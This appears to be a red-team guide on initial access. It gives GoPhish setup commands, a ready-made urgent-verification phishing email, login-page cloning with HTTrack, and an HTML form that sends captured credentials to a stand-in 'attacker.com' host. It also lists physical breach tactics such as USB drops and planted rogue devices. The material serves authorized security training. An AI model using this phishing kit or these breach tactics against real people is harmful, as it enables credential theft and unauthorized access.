Initial Access Operations
Phase 1
Initial access is the first foothold in a target environment. Red teams use phishing, physical breaches, supply chain compromise, or perimeter exploitation to establish their first C2 beacon.
Phishing Campaigns
bash
# GoPhish - Open-source phishing framework
docker run -d -p 3333:3333 --name gophish gophish/gophish
# Access at https://localhost:3333
# Default: admin:gophish
# Email template example (credential harvesting)
Subject: [URGENT] Security Alert - Verify Your Account
Dear {FirstName},
We detected suspicious activity on your account. Please verify your identity immediately:
https://login-portal.company-domain[.]com/verify?token={RId}
This link expires in 24 hours. Failure to verify will result in account suspension.
IT Security Team
# Landing page: Clone legitimate login page
# Use HTTrack or manual cloning
httrack https://login.company.com -O /tmp/clone
# Add credential capture form submission to attacker server
<form action="https://attacker.com/harvest" method="POST">
<input name="username" placeholder="Email">
<input type="password" name="password" placeholder="Password">
<button type="submit">Sign In</button>
</form>Physical Breach Tactics
- Tailgating: Follow authorized personnel through secure doors
- USB Drops: Leave malicious USB drives in parking lot/lobby (labeled "Executive Salaries 2025")
- Rogue Device: Plant Raspberry Pi with 4G modem for persistent network access
- Social Engineering: Impersonate IT support, delivery personnel, or contractors
Physical Safety First
Never compromise personal safety during physical breaches. If confronted by security, immediately identify yourself as a red teamer and produce authorization documentation.